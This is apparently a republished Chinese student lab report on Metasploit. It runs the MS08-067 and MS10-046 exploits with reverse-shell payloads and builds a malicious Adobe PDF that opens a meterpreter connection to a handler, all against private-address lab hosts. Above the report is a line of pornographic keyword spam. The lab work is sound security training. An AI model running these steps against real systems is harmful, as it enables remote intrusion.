日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

20155210 Exp5 MSF基础应用

發布時間:2024/6/30 编程问答 41 豆豆
生活随笔 收集整理的這篇文章主要介紹了 20155210 Exp5 MSF基础应用 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

Exp5 MSF基礎應用

一個主動攻擊實踐,MS08-067

  • 首先利用msfconsole啟用msf終端

  • 然后利用search MS08-067搜索漏洞,會顯示相應漏洞模塊

如圖:

  • 根據上圖,我們輸入use exploit/windows/smb/ms08_067_netapi,選擇相應的模塊

  • 然后我們可以使用show payloads,查看可以使用的模塊

如圖:

  • 然后根據上圖,為獲取靶機的shell,所以利用set payload generic/shell_reverse_tcp

  • 然后輸入show options,查看配置信息,知道我們需要配置RHOST,LHOST,LPORT,target
    如圖:

  • 輸入
set RHOST 192.168.241.138 set LHOST 192.168.241.134 set LPORT 5210

進行配置

  • 然后我們再次利用show options,查看配置信息
    如圖:

  • 然后exploit進行監聽

如圖:

  • 如果出現如下情況,關閉防火墻,就可以解決

針對瀏覽器的攻擊,ms10_046

  • 起初我打算做ms11_050,攻擊IE瀏覽器,但是IE8.0版本,不能成功,可能是IE8.0已經修復相關漏洞了。

  • 所以我選擇了ms10_046,首先輸入search ms10_046查找漏洞

如圖:

  • 由于我們要對瀏覽器進行攻擊,所以我們輸入use use exploit/windows/browser/ms10_046_shortcut_icon_

  • 然后我們輸入show payloads,查看載荷進行選擇,這里我仍用實驗一中的載荷set payload generic/shell_reverse_tcp

如圖:

  • 我們利用show options查詢需要配置的有,LPORT,LHOST,SRVHOST

  • 輸入
set SRVHOST 192.168.241.134 set LHOST 192.168.241.134 set LPORT 5210

進行配置

  • 再次查看配置信息

如圖:

  • 然后輸入exploit生成URL

如圖:

  • 在windows端訪問該URL,kali端如圖:

  • 輸入sessions,可看到一個ID為1的連接
    如圖:

  • 然后輸入session -i 1,接入ID為1的連接,輸入shell,獲取成功。
    如圖:

針對客戶端的攻擊

  • 首先還是先利用search adobe進行搜索
    如圖:

  • 然后進行選擇,我選擇的是use windows/fileformat/adobe_flashplayer_button

  • 然后set payload windows/meterpreter/reverse_tcp,設置所用荷載,利用show options查看所要配置的信息
    如圖:

  • 輸入如下代碼,對LHOST,LPORT,FILENAME進行配置
set LHOST 192.168.241.134 set LPORT 5210 set FILENAME 20155210.pdf
  • 輸入exploit,生成20155210.pdf文件
    如圖:

  • 輸入use exploit/multi/handler,進入監聽,并設置監聽端口,主機號

  • 在windows端,打開20155210.pdf,成功回連
    如圖:

輔助模塊應用

  • 首先利用show auxiliary,查看輔助模塊

  • 我選擇的是scanner/dns/dns_amp,掃描dns

  • 輸入show options,查看配置

  • 輸入exploit進行監聽

基礎問題

  • 用自己的話解釋什么是exploit,payload,encode

  • exploit:針對靶機的漏洞,利用靶機中的后門,對靶機進行攻擊

  • payload:相當于shellcode前身,也就是后門的模板

  • encode:對payload進行編碼

實驗體會

我們應該盡可能的,去更新最新版的軟件和系統,否則就會給黑客可乘之機。

比如,我們做的實驗都是基于xp系統的,但是如果對win7、8、10,進行攻擊則無效。

比如,我在做實驗2時,想做老師給的例子,但是那個漏洞對IE8.0不好使。

我們沒有一個可以針對現用系統或者軟件的滲透攻擊庫,離實戰還是很遠的

轉載于:https://www.cnblogs.com/panyinghao/p/8921439.html

總結

以上是生活随笔為你收集整理的20155210 Exp5 MSF基础应用的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。